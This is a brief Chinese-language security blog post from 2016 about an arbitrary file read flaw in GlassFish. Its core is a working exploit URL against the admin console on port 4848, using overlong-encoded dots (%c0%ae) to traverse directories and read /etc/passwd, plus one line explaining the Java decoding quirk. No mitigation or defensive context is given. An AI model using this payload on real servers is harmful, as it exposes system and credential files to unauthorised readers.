MENU

glassfish任意文件读取漏洞

January 4, 2016 • Security

利用:

http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

java会把"%c0%ae"解析为"uC0AE",最后转义为ASCCII字符的"."。

640.jpg

Archives QR Code
QR Code for this page
Tipping QR Code